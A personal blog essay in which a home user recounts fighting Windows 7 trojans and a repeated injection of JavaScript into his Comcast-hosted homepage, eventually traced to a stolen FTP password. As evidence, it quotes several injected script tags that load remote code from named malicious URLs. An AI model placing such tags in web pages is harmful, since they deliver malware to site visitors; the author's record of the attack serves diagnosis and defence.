        Run MalwareBytes Anti-Malware and sure enough it flags temp34.exe as a trojan ('Trojan Lameshield'). And it has a registry value. Program also finds a trojan with a random name c:\users\window_7\wgs.......exe

        "Trojan.Lameshield Virus is nasty Trojan. It creates combine effect of rootkit and adware. Which means you will be bombarded with a lot of ads and your browser gets hijacked and redirect to specific page."

        A reference pointed to a tool built into the Windows 7 operating system that I had never heard of: System File Checker (sfc.exe). This program is a real gem and can fix a lot of weird Windows problems. It checks, and its key feature, will automatically replace orrupted Windows 7 system files with clean versions. Yes, Windows 7 has a tool (built-in) to fix its own files! Who knew. Windows was preinstalled on my machine, so for backup purposes there is an archive of (original) Windows files on drive d:\, and this is what the program uses. I read that if your machine has no Window archive on the hard drive, then you need a set of Windows backup disks to run this program, which obviously makes it harder to use.

Safe mode and registry file editor not working
        Prior to running this tool I had lost two vital system functions needed to fight virus attacks: 'regedit.exe' would not run and Safe mode came up with a black screen, no icons. The Windows registry editor (regedit) would not run, no error message, it just ignored any request. Made a copy of it with different name, but it won't run either. I downloaded a free registry cleaner (Free Window Registry Repair). I found it was able to access and change the registry, but even with a lot of cleaning 'regedit.exe' still would not open.

How to run it
        All Programs, Accessories, select Command Prompt, right click it to run it as administrator, then type in dos like window text below

                    sfc /scannow                         (sfc => system file checker)  (note space between sfc and /scannow)

        It takes 10 min to run. If it finds no problems it tells you at the end. In my case it just told me it had repaired some files, but I needed to go to its log (c:\Windows\Logs\CBS\CBS.log) to see what changes it had made. Its log showed it repaired several files including a version of regedit (not actually regedit.exe), but this fixed the problem. Regedit now runs normally!

Safe mode and regedit repaired by sfc.exe
        Not only did System File Checker fix regedit, but it appears to have fixed Safe mode too, my Safe mode icons are back!  For the last week or so since my ad infestation and prior to running System File Checker when I went into Safe mode I had no icons, just a black screen with Safe in the four courners and the Build # at the top. It was usable in this corrupted state, but just barely. Ctrl-Alt-Del would bring up Program Manager and under File, Run a new process, you can get to a file browse screen, and from there by knowing the location of MalwareBytes anti-maleware I can run it. Repeated web searches showed a few others had the same problem with Safe mode, and I found the 'Run' work around tip, but no one had any idea as to how fix the Safe mode corruption. I think I stumbled on it.

        On forums I find comments that the utility of tools like file checker can be compromised if the OS is updated with service packs. (Really? I hope Microsoft isn't this stupid.)

More on Microsoft 'System File Checker'
         I have used Windows for decades and had never heard of System File Checker (sfc.exe). One reference called it a staple of IT pros. I did not have to download this program, it is part of Windows 7 Home operating system, yet curiously there is no mention of it in the Windows Control Panel or Help System! (typical Micosoft...)

Microsoft explains here how to run it
**        "Use the System File Checker tool to troubleshoot missing or corrupted system files on Windows Vista or on Windows 7"
         http://support.microsoft.com/kb/929833#method1

Here is a video on the history of sfc.exe and a demo of how to run it
         http://windows7forums.com/blogs/mike/353-compute-confidence-windows-system-file-integrity-checker.html

Safe mode with no icons
        The Safe mode screen with no icons is interesting. It's a black screen with Safe in four corners and Built # on top. When I found icons had disappeared from my Safe mode screen, I found that running System File Checker fixed the problem. I saw a few other people online reporting this same problem, but without fixes.

        When I stumbled onto this, I considered it to be a damaged Safe mode, and maybe it is, but now I am not so sure, because I have found a way to get into it at will. This procedure will do it: boot to Safe mode opening screen (F8 from a power up state) and select 'Safe mode with Command Prompt', then type 'exit' to close out the command window, and Voila you end up in a black screen with 'Safe' in four corners and built # on top and no icons.

        I had read online that in this black, no icon Safe mode screen by hovering the mouse over the lower left corner a start menu would popup. I hadn't noticed while recovering from viruses, so I was skeptical. When I try it on the black Safe screen I get using the procedure above, sure enough it doesn't work. I can click and hover anywhere on the screen and nothing happens.

How to navigate in the 'black' Safe mode screen
        What does (normally) work in  in the 'black' Safe mode screen, and as far as I can tell the only thing that works in the screen, is Ctrl-Alt-Del interrupt. This allows you to get to Task Manager, and from there by selecting 'file, run, browse' you can get to Explorer, so if you know the address of anti-malware or other programs you can run them. I stumbled onto this trick and found it to be one of the best tricks to help recover from difficult virus attacks.
------------------------------------------------------------------------------------------------
Fake Adobe Installation virus recovery (12/6/12)
        I have confirmed that an Adobe Installation screen (with sliding bar) that aggressively pops up is in fact a fake. It has popped up twice this morning. I quickly hit the kill 'x' and it disappears, but don't know what this means. MalwareBytes shows two recent trojan infections both in c:\windows\installer and almost for sure are what is throwing up the Adobe screen

            Rootkit.0Access
            Trojan.Dropper.BCMinor

I have multiple problems trying to recover from this one

        1) Malwarebytes (in normal Windows mode) can't seem to kill this. It says it quarantines it, but a few minutes later it is back. I run Malwarebytes again and same problem.
        2) c:\windows\installer don't show any recent entries, nor can I find a file or directory with the URL Malwarebytes gives
                  (Reason -- date on '1dace891... ' directory was old which faked me out, but inside it I found two subdirectories 'U' and 'L' with today's date)
  **  3) Can't get into Safe mode. F8 on two tries does not work. This is a big problem. I was going to run Malwarebytes from Safe mode, but I can't get there. I have shut down my cable modem and will run 'System File Checker' to see if it can fix the Safe mode problem.

           (I eventually got to Safe mode, but whether it was hardware power down (holding power button down) or deletion of the
             fake Adobe Rootkit files I don't know. Getting into Safe mode with F8 on a restart is hard (failed four times in a row),
             better to start boot from a power up.)

Even though my system was clean a few days ago, System File Checker reports that it did indeed find corrupted files and repaired them. Very hard to read the long log file, but searching 'corrupted' it look like this file was corrupted and replaced.  (I later read every time you run the System File Checker it just appends to the existing log, so to see the results of the latest run you need to start by searching for the current date.) Who knows what this file does.

            C:\Windows\System32\services.exe

        I was able to locate the two trojans identified by Malwarebytes and found several more suspect files in two different subdirectories ('U' found by Malwarebytes and 'L') that had come in two groups about an hour ago and deleted them all.

                    c:\windows\installer\(1dace891.....

        Without rebooting ran Malwarebytes again, and this time it comes up clean. Rebooted by pushing power button and this time F8 brought up Safe mode. Ran MalwareBytes in Safe mode and again clean. Reconnected to internet rebooted normally and again ran Malwarebytes and still clean. HiJackThis tells me 'hosts' file OK too, so it looks like fake Adobe Installer, which is really trojans [Rootkit.0Access] and [Trojan.Dropper.BCMinor], are gone. (And for three weeks they have stayed gone)

Does hardware power (button held down) work better than soft Restart for getting into Safe Mode?
        Two tries with F8 had failed. The second F8 try failed after System File Checker ran and fixed a system file. F8 on 3rd try finally worked either because the fake Adobe installer trojan files had all been deleted or because I had used the hardware button (held down) to shut off. (I since had two mor failures trying to get into Safe from a restart. A boot from power up sometimes fails too, but it's works moe than half the time.)

Tablet camera is a good tool
        I found a real convenience in virus fighting (since paths are so long and file names often long random strings) is to use the camera on my BB tablet computer to photograph outputs from the tools. Then later I can pull up the tablet picture and use Explorer to go search for the 'bad guy' files.

===================================================================================================

Introduction
       I suffered my 3rd computer crash in my Windows 7 machine in two years recently. Wouldn't boot, machine sat 'dead' for a week, while I ran on my backup XP machine. Bought a new hard drive and Windows 7 disks, but didn't put it in when I managed (using System Restore on 4th try!) to get the old hard drive to boot. I then ran malware tools on it and looked at their logs around the time of the crash, and son of gun if a trojan file didn't load just seconds before the crash. Did a trojan crash my machine and prevent it from rebooting? I think maybe it did.

        Now a strange twist. I run my anti-malware utilities and Anti-Malwarebytes reports one suspicious item:

                Trojan.Agent.NIX                    E65B.tmp               124k         @ 22:05:23  (10:05 PM)     12/11/12

        When the computer crashed, I noted the time on the wall clock: about 10:04 pm, Tues 12/11/12. This is very close to the time the virus file was written. I do a time search using Agent Ransack, and it shows the last file written to the drive (before a gap of four hours) was 22:05:54, which is just 31 seconds after the virus/trojan comes in. Since the crash shutdown maybe took 5 -10 seconds before power off, it looks like the computer began to go down about 20 seconds (or less) after the virus came in! (I say 'less' because it's possible that some of the files at the end were written during the failed boot that I immediately tried, though it didn't look like it.)

        What are the odds! This is a strong circumstantial case that my computer/hard drive crash was caused by this virus! (However, I suppose it is possible that my power button forced power down in the midst of a virus induced computer crash might have actually cause the boot problem. Who knows?)

        I looked at all the files Agent Ransack found around this time looking for more virus stuff, but found nothing really suspicious. I did see that Malwarebytes had detected E65B.tmp coming in with writes to its log "Allowed" at the exact second it came in. I can find out very little about this virus. I do see it listed in some virus lists, but with no other info. On the negative side, it's a .tmp file, didn't see any .exe files in the time window. A search of the registry for 'E65B.tmp' came up null. So other than the (very strong!) time coincidence, I don't see how a .tmp file (alone) caused the shutdown. (More research turned up very little E65B.tmp or Trojan.Agent.NIX except it might be associated with Dyfuca or Rootkit.TDSS)

New insight on .tmp virus file
        Clearly a weakness in the argument that a virus crashed my computer is that the virus file written seconds before the crash was a .tmp file rather than an .exe file. But a recent attack by a more virulent variant of the FBI lock virus has given me new insight on this.

        In the latest FBI attack, where Safe mode was also disabled, a search of a few minute time window (centered at the time of the attack) found only two .tmp virus files (both logged by Malwarebytes), no .exe file at all in the window. Using the Malwarebytes log I was able to find the virus .exe file, but unlike in all previous attacks, the virus .exe file had downloaded minutes earlier (about 19 minutes before lock) and seems to have waited around for the .tmp file(s) to appear, because the lock happened exactly when the .tmp files were written.

Where did E65B.tmp trojan file come from?
        A further and important mystery is where did the file E65B.tmp come from. My memory was I was not browsing when the sound went off and the computer began to suddenly log off, I was watching TV on my computer. And I found data that confirmed this. I found that I took a screen capture picture (TV show Cheers) at 22:05:20. This is justthree seconds before E65B.tmp trojan file is written.

        Very weird. From the time of the picture this confirms that I was (probably) not browsing at the time this (virus) file is written, so where does it come from. (The weakens the case somewhat the this virus file cased the crash.) I can't be 100% positive I was not browsing as I often switch back and forth, still the picture is just three seconds ahead of the file time.

        One possibility here is that my computer has gotten some bot rooted deep that no malware can find, and it has some control of the machine and is possibly downloading and (horror) uploading stuff on its own. Scary. This would be an argument for either putting in my new hard drive, or doing a reformat and reinstall of Windows and all my programs.
================================================================================================

No more homepage infections (update 12/25/13)
        While it took me quite a while to figure out how my homepage was getting (repeatedly) infected, when I did, it was not difficult to block access to the bad guys. Turns out all that is needed for your homepage to get infected is for bad guys to get access to the username and password you use to access your homepage files on your server. (Your server is generally easily identified.) With this information they can upload your files, modify them (adding javascript virus code in my case), and then download them to your server overwriting the original files. Presto your homepage is infected, and when Google next checks, they will flag your search result with the dreaded: 'this site may harm your computer'. Solution: change username and/or password.

Overview (9/22/13)
        I noticed the Google listing for my home page ('Twinkle Toes Engineering') was now marked (see below) --- "This site may harm your computer", which was not only a warning, but basically a block since there was no link to continue. Not good. Everything on my site, nearly 70 essays, were blocked! In a review of my files Google told me by site was seriously infected, but gave no help in figuring out by what, where or how. I was on my own to find and fix the problem.

        By downloading a sampling of my files from the Comcast server and looking at the raw source code with my Opera browser I discovered that every one of my .htm files were infected. A full page of javascript code had been inserted, usually after the title. Looking at the raw source code of the original .htm files on my hard drive showed they were clean, none of them had this javascript code. The Comcast files were all infected and my local files were all clean! Hmm... This means my html editor (Netscape Composer) and local files had not been attacked. A quick upload/download test showed that my FTP utility (CoffeeCup Free FTP) was not corrupting the files. The only remaining possibility was that the files got infected while on the  Comcast server. Comcast was responsible for my site getting totally virus infected, or so says Google (and what do they know about programming)!

Raw htm code showing infection
       Here's are screen captures of the raw html code from one of my homepage .htm files (as displayed by Opera 12.16). The first version I downloaded from the Comcast server, and second below it is the version of the same file from local hard drive, which is the master file. Notice the several lines of red 'javascript' code in the screen below. Notice how it is formatted differently from the rest of the code output by my html editor. This (red) javascript code does not exist in the second screen capture of the version of the master file from my hard drive. This javascript code was inserted into my .htm file, into all my .htm files on the Comcast server, at Comcast, presumably by a virus. I have no way of knowing what this javascript code does (It is a minature program, which is actually much longer than it appears below because the javascript code extends far off screen to the right), but Google has flagged it as a virus infection.

        Even the remote possibility that a virus on my computer might have found my .htm files, figured out my server was Comcast (oh, yea) and uploaded files that it altered while uploading can be ruled out. I found on the Comcast server an old file I had deleted years ago from my hard drive (early telephone-telegraph file before I split it into two separate essays). I downloaded it, and sure enough it was corrupted too by the virus entered javascript code. That nails it, the modification of these files had to have occurred at Comcast. All my files (with one exception) in two different directories had the added javascript code, exactly same code added to every .htm file. The one Comcast file without the javascript code I had uploaded a new rev just days before.

Time of attack
        Further I can see when the virus attack took place. My FTP utility shows me the filetimes of my files on the Comcast server, and I see every .htm file on the server was rewritten in a three minutes period about five days ago (9/17/13)

Cleaning up Comcast files
       I cleaned up my site by uploading clean versions of all my nearly 70 .htm files from my local drive to the Comcast server, overwriting the existing files there. After hours of work to figure this all out and clean up Comcast's mess at 4:00 am I requested Google do another virus review of my site and went to bed. Next morning my Google listing was clean, the 'harm your computer' warning gone.

        Now to bitch at Comcast, who has never informed me that their system was attacked and files were corrupted. (Or are they going to tell me they added the code, and it is beneign. If so, they better tell Google!)

Tackling the problem
         At first I had no as to how clue as to how to proceed to find the virus in my home page, no idea what to look for in the raw html source code. I had had a lot of virus infections on my computer this year, so my first guess was a virus had gotten to my local .htm files (or maybe my html editor).

Javascript code in every .htm file at Comcast!
        When I started comparing my local files to the same files on the Comcast computers, it wasn't hard to find the infection. (see figures above). A long string of 'javascript' (in red) has been added to all my .htm files on the Comcast computer (surprisingly not at the end, but usually after the title), code not present in the (master) version of the files on my hard drive.

        That means the virus infection of my site happened at Comcast! I've always thought Comcast 2nd rate technically, another nail. And of course there has been no email from them saying that they were compromised, and as I write it is five days after the attack.

        I have no idea what the virus added javascript code does (or even its name, it is all in hex). It took many hours of work to figure this all out, and after uploading clean versions of all my htm files (not the pictures) to Comcast. At 4:00 am I asked Google to do another virus check of my site and went to bed. Woke up next morning and the warning was gone from my Google listing, so replacing all the .htm files did the trick. As a followup I used a fragment from the javascript code to search for any local file that might contain it. I found  a few cryptically named .htm files with this fragment in a special recycle directory called 'S-1-5-18', which I don't understand, and can't delete.

        Another virus adventure, another virus recovery.
------------------------------------------------------------------------------------------------------------
My homepage is infected again!(10/4/13)
        About two weeks after I cleaned up my site and Google removed the Warning, I check my site at a hotel (on 10/2/13) and again I find it blocked, same 'harm to your computer' warning from Google. At the hotel with some effort I manage to get around the block and open one of my essays and look at the source code, and there it is. Again a long block of javascript has been wedged into everyone of my .htm file on the Comcast servers. I am pissed. (I had not called Comcast about the first attack, thinking the problem was behind me.)

Many Comcast homepages are infected!
        Look at the above screen downloaded 10/4/13. Google is reporting that a lot of home.comcast.net pages are infected. Clearly my site is not singled out, a lot of home pages on the Comcast servers are infected!

Comcast file dates
        As before I see all my .htm files on the Comcast server have filedates showing they were all rewritten within a three minute period. But I see something interesting. Looking on Fri 10/4/13 I find all data/times are Thur 10/3/13 17:40 (index file) to 17:43. But I had seen the Google warning the day before on Wed 10/2/12. This must mean the files are being regularly rewritten! Is it possible Comcast adds something for their own benefit? So far a quick google turned up nothing.

Upload virus file test
        On Fri 10/4/13 at 5:40 pm (17:40) I uploaded a slightly modified version of my hydrogen car .htm, which I looked at and verified is clean. I have not linked in this file to my index or any other file. My FTP utility shows the upload filetime at Comcast is 21:40, which is four hours later than EDT. A little checking shows this is the current GMT. This means the files were rewritten at Comcast at 17:40 GMT - 4 = 1:40 pm EDT Thur. I had left the hotel by this time, and I know I checked the files Wed night.

        The file sizes are also interesting, but I don't understand them:
                                                                                 On my hard drive                    On Comcast server
                 hydrogen_car.htm                                         169.9k                                            166.4k
                 hydrogen_car_virus_test 10-4-13.htm            169.8k                                            167.5k

        I am going to watch this uploaded .htm file and see if, or when, it gets rewritten and presumably modified with added javascript. As recently uploaded it has a file date of Oct 4th, about 28 hours after all the other .htm files.

(update 10/8/13)
        My virus test file, which has been sitting on the Comcast server but it not part of my site,  survived for three whole days on the Comcast server computers before being rewritten and modified. Checking on following Tues I find all my .htm files on the Comcast server have been rewritten (again!), most on the previous day, Mon (10/7/13) in a three minute period 13:44 to 13:47. The only exception is two .htm files that have a later filedate, Tues (10/8/13) at 11:50, and curiously one of these files is the index file.

Javascript 'header' most common
       When I look at the source code of my virus test file (hydrogen_car_virus_test 10-4-13.htm ), I find it has been modified with code wedged into it, but not as before. The only code I find has been added is below, which looks like the javascript header without the body.

         <!--2d3965--><script type="text/javascript" language="javascript"></script><!--/2d3965-->

        When I download more files from the Comcast server, I find all, but one, have just a javascript 'header' (like above) wedged in. This is very different from about two weeks ago when every .htm file I looked at had a big chunk of javascript added. However, this time one file still carried a big piece of added javascript wedged in, and probably not coincidentally it was the index file.

Warning removed again by Google
       On Oct 8th for the 2nd time I cleaned up the infection at Comcast. I deleted all my .htm files at Comcast, then uploaded a clean set from hard drive. I then told Google I had cleaned up the site and asked them to recheck it. Next day I found Google had removed the virus warnings from all my URLs.

Comcast 3rd infection (10/24/13)
        This time I caught the infection before Google (I hope) on the day all the files were rewritten on Comcast server (in three min as ususal), but there were some twists this time.

                        <script src="http://realhospitalar.com.br/tmp/KX935Fs3.php"

        1) There was readable code (above) in the java script wedge, but only in the index file. All other files had some java script wedged in too, but it looked like the body was empty. Above gives me something to trace, and while there were only a couple of returns by Google, in fact Google browsing identifies the exact URL above as 'Malware site' (though many other virus programs say the site is clean).

        I think the above code means the http site is the source of the javascript. '.com.br' is country of Brazil. 'realhospitalar' is Portuguese and means Royal Hospital

        2) This little piece of readable code proves that the javascript wedge is not something Comcast is doing for its own purposes. It has got to be a VIRUS. I called Comcast for first time to try and get hold of some technical expert on web pages without sucess. All I got was an offer of some sort of boilerplate virus check, for which they were going to charge me $130. I hung up. Later that same evening I had the Comcast site cleaned up and my local homepage files back to normal.

        3) There is some circumstantial evidence that maybe the infection is on my machine and the uploading is coming from it. Still seems remarkable to me that a virus would know how to make a FTP connection with my server, who it has to figure out is Comcast, AND on top of this the files need to modified on the fly as the upload occurs. Probably doable, but seems very difficult.

Virus on my machine?
       What is the evidence? The clue that something may not be right on my machine is that I found on same day that more than half of my web site files were missing!   Eveything after 'h' was missing, .htm and picture files too. (Of course I have backups) I got contradictory file properties and finally figured out that the missing files were apparently where they always are, but they were somehow hidden. The visible .htm files looked clean and when I eventually got control of the other .htm files on my hard drive they looked clean too.

        I was going to delete the directory and rewrite it, but first I powered down. When I restarted, I got a chkdsk screen that said my files should be checked. I let it run and it took 15-20 min finding quite a few errors and fragments. But when Windows finally restrarted my missing file were where they should be and all visible. A sample of a few showed they were clean. So I overwrote all the Comcast .htm files, with what I hope is clean versions from my hard drive.

        Is this a coincidence or the work of the virus? Don't know, it might just be a coincidence. I ran all my virus tools and nothing. I searched the registry with the key word and blank. I did a file search for text containing the key word. A few files (after hours) showed up, but they all carried later dates. (I deleted what I could of them).

        So some progress, but the source of the infection is still a mystery. The only odd virus like thing that happened today is a couple of times a window popped up saying I needed the VLC media player to view page. This looks bad. I have never seen anything like this, but a scan for a running VLC file came up blank.

Another clue the virus might be local
        There is another clue that the virus might be on my machine and causing an upload of corrupted files to Comcast. That clue is the file times on the Comcast server. When I did a mass upload of all my .htm file (previously I uploaded in batches), I noticed (on a quick look) the file times on the Comcast server were in a three minute window. This is just what I see when I find my files corrupted on Comcast! What are the odds it would take 3 minutes to rewrite the files if the virus was preent on the Comcast servers?

        This opens up the option for doing some tests. For example plant a dummy .htm file locally that I do not up load (zz_virus_upload_test.htm). The virus could be just by just uploading .htm files in finds in the same local directory as the index files (and subdirectories). Or it might be reading the index file, and either using that as a guide as to which files to upload, or it might even be sequentially downloading a file, wedging in the javascript, and then uploading it again. I probably should link to the dummy file in the index file.

Comcast 4rd infection (10/28/13)
        I think the virus may be winning. It used be about two weeks before a reinfection, this time it's just three days! This time only about 2/3rd of the files had new filetimes, and only these were corrupted. The wedged javascript code has changed. This time it is calling the source code from a new location (below), which of course, shows up in a google search as reported malware. I immediately cleaned out all the .htm files and uploaded a clean set (with my zz_virus file trap set).

                        <script src="http://sgaccounting.net/wp-includes/YXdeEXY6.php"

Wedge code in index file: <!--339810--><script type="text/javascript">var gwloaded = false;</script><script src="http://sgaccounting.net/wp-includes/YXdeEXY6.php" type="text/javascript"></script><!--/339810-->

        When I try to enter this site I get a strange (and blocking!) popup that VLC (video player) is needed to view the site. My search engine also finds the key words in long files (with no suffix!) that it identifies as a video file. Looking at the files of VLC I find only one new file, which is just three days old (within the infection period), in the plugins subdirectory called  'plugins.dat' and its type is Mpeg movie! I deleted it.

        It seems likely that just trying to access this site did some damage to my hard drive, because a few minutes later when I reset my computer, it triggered minutes of Checkdsk activity, same thing that happened last time. I found the site had added 'sgaccountng' cookies. Might they be damaging is some way and have triggered the checkdsk activity? I think this is a possibility.

Comcast 5th infection (10/29/13)
        Now the infections are a day apart! New clues.  Only some of the files (beginning a - n) have been rewritten, so a pattern is clear, they are rewritten starting alphabetically. Every infection now has a new URL for the javascript. I confirm Comcast times are 4 hours after EDT, so the (partial) rewrite occured at 5:00 am this morning, when my machine was on, but I was in bed. At 5:00 am it was no recording or doing any other preassigned task.

        -- Files at Comcast have clearly been rewritten in alphabetical order. First written is Astronomy.htm written at 9:00 (comcast) 10-29-13, which is 5:00am my time. [9:00 astronomy (only), 9:01 (atoms - josephson), 9:02 (kindle - negative)]

        -- Relative filetime check. Uploaded file at 10:44am and its Comcast filetime is 14:44, so Comcast files are four hour later than EDT.

        -- <script src="http://pahypnosiscentercom.ipage.com/images/DiwGN0WL.php"

        -- upload of all 56 of my .htm files (sans javascript wedging!) took less than 2 minutes (10/29/13 15:08 - 09)

         What I need is an FTP log to see if uploads are occuring from my machine. Unfortunately CoffeeCup free FTP doesn't seem to have one. I should examine their offerings. Repeat scans with my maleware utilities produce nothing.

And again 10 hours later!
        Check before bed shows all .htm files rewritten at Comcast (10/30/13 5:06 - 09), which is about 1:06 am EDT while computer was on and in use. Again ooks alphabetical except index file first (or in first (06) group). zz trap file not uploaded. The four .htm files in subdirectory changed too after the main directory (09 file time). Last time the subdirectory .htm files were unchanged.

        Did I interrupt the process, or does this do anything? The index files and two sample files has just below wedged in:

                   <!--2d3965--><script type="text/javascript" language="javascript"></script><!--/2d3965-->

        Filetimes at Comcast of clean uploaded set of 56 files is (10/30/13 7:56- 57)

And again a few days later --- my trap is sprung (11/5/13)
        Big progress, the trap I laid with the spurious files has been sprung. I now have PROOF that the infection is occurring at Comcast! A few days ago after the last infection I had added two spurious .htm files that are not part of my site, i.e. not linked in the index file. One resides is in my local set of homepage files and the other (with a different name) is on the Comcast server.

        I have been checking the Comcast server daily and on my last check I found all new filetimes. I found ALL the .htm files (in subdirectory too) had new filetimes including the spurious file on the server, and sure enough it had javascript (below) wedged in. Also my spurious local file did not get uploaded. This must mean the virus corruption is occurring on the Comcast server. There is no way that the corrupted files are somehow being uploaded from my machine, because I don't have a local copy of the spurious Comcast file.

The javascript code I found wedged into the spurious file on the Comcast serveris below:

            <!--339810--><script src="http://buysitka.com/6jyJ4fuB.php" type="text/javascript"></script><!--/339810-->

Next day (11/6/13) infected again
        The time between infections is variable, can be one day, several days, or weeks. Here is lastest wedge.

            <!--339810--><script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script><!--/339810-->

Another way in?
        I have found a place to research, Comcast home forum. This will take time, lots of posting.

        A quick look shows no attacks like mine, which gave me a new thought. It might be that a local virus has at some point scanned my FTP utility and has (somehow) captured my FTP username and password. Then it could just make contact with Comcast via FTP (pretending to be me) corrupting my files by downloading them and uploading them with javascript wedged in. This would explain why virus corruption at Comcast is not widespread. General google searches turn up very little.

        It also suggests a possible fix: change my Comcast FTP password!

Homepage virus attacks defeated (update 12/5/13) (update 12/25/13) (update 8/29/15)
Victory (update 12/25/13) (2/19/14) (8/29/15)
        Time to decay victory, no homepage attack for 14 weeks, since I changed my FTP password. Another year has passed (8/19/15) and my homepage has remained clean, so there is no doubt that changing my FTP password fixed the attack on my homepage.

Virus infections gone! (8/29/15)
        Not only have attacks on my homepage stopped, but my repeated OS virus infections are a thing of the past. Oh, in the last year or so I occasionally get a screen freeze with the message: 'If you can see this message, then your computer is infected', but there is no virulence anymore. Recovery is child's play, just pop into Task Manager (Ctrl+Alt+Del) and shut down the browser. Don't even need to reboot. I can't explain it, but was my compromised FTP password also reponsible for my virus infections? In the last year or so I have also switched over to a clean version of Window 7 and have shut down all Windows updates. I would need to check timing to see if that has played a role.

        The scenario that I proposed above does fit all the facts. The scenario is that the virus is neither local on my machine (at least not now), nor on the Comcast servers. The attack on my homepage files at Comcast is coming from an outside malicious site has somehow gained access to my user name, password and server. That's all it needs to modify my files. With a username and password its FTP gains access to my files. It uploads all my .htm files and (at its leisure) it wedges in the virus code into them all, then with them in a que it uploads the corrupted files overwriting the files that are there.

        This explains why the new file times are all within a three minute period, because this is about the time my FTP server takes to upload a full que. It explains why the dummy file I put on the server gets modified, but a different dummy file on my hard drive does not. It explains why Comcast is unaware of this virus, as probably very few (maybe just me) Comcast home pages are attacked.

        What would be confirming, which I have not pursued, is if Comcast could provide a transaction log. If my scenario is right, it would clearly show the upload of the files, and the URL where they are being uploaded.
------------------------------------------------------------------------------------------------------------------------------------------------------------

How to put up a homepage
        Putting up a homepage is really pretty simple once you have the tools and learn a few rules. Just two steps:

       1) Write text and add pictures in an html editor.

        My html editor is the (free) Netscape 'Composer'. It was used to write the Netscape browser, so although 15 years old, it is very capable and bug free. The version of 'Composer' I use is included in Netscape Communicator 4.8, which is archived and can be downloaded. (Later versions of the Netscape browser (6.xx), included 'Composer' too, but key features like the spell checker began to be dropped or not work right.) 'Composer' is included with the Netscape 4.8 browser but is very easy to miss. It is a separate program that opens when in the browser you click: 'Open', 'Edit page'.

        The html editor saves the text as an .htm file to a local hard drive. This file is my text with html tags added and has links to the pictures, which are kept as separate files in same directory. I can 'open' this .htm file in any browser and it will display as I wrote it (opening the picture files as required).

       2) To put it online only requires that all the files be copied (uploaded) to the computer at a server (in my case Comcast). This is done with an 'file transfer' (FTP) utility, I use the 'CoffeeCup free FTP' utility. It has a split screen that shows local directories on one side and the server directories on the other. You can then copy files (in either direction) between the two directories as with any file manager. The server doesn't (or shouldn't) modify the files in any way, it just allows them to be read when someone clicks the associated address (URL), in my case 'Twinkle Toes Engineering'.